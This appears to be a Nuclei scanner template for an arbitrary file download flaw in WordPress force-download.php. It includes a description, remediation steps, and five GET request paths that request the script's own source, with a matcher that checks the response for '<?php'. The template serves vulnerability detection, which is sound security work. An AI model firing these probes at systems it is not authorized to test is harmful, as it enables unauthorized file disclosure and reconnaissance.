id: Wordpress-force_download_Plugins-FileDownload
info:
  name: Wordpress force download Local File Download
  author:
  - l0ne1y
  description: |-
    WordPress force-download.php arbitrary file download vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    WordPress has multiple path traversal vulnerabilities in force download.php, which allows remote attackers to read arbitrary files in the system through the file parameter.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org

    Temporary fix:
    1. Filter \".\" so that users cannot go back to the upper directory in the URL.
    2. Regular matching strictly determines the format of user input parameters, hard-codes or uniformly encodes the file name parameters passed by the user, performs whitelist control on file types, and rejects parameters containing malicious characters or null characters.
    3. Prohibit the system from providing directory traversal services, such as: php.ini configures open_basedir to limit file access scope.
    4. Save the file path to the database and let the user submit the file corresponding to the ID to download the file.
    5. Verify permissions before users download files.
requests:
- matchers:
  - type: dsl
    condition: or
    dsl:
    - ' contains(body_1,"<?php")'
    - ' contains(body_2,"<?php")'
    - ' contains(body_3,"<?php")'
    - ' contains(body_4,"<?php")'
    - ' contains(body_5,"<?php")'
  matchers-condition: and
  path:
  - '{{BaseURL}}/force-download.php?file=force-download.php'
  - '{{BaseURL}}/wp/wp-content/force-download.php?file=force-download.php'
  - '{{BaseURL}}/wp-content/force-download.php?file=force-download.php'
  - '{{BaseURL}}/wp-content/uploads/patientforms/force-download.php?file=force-download.php'
  - '{{BaseURL}}/wp-content/themes/ucin/includes/force-download.php?file=force-download.php'
  method: GET
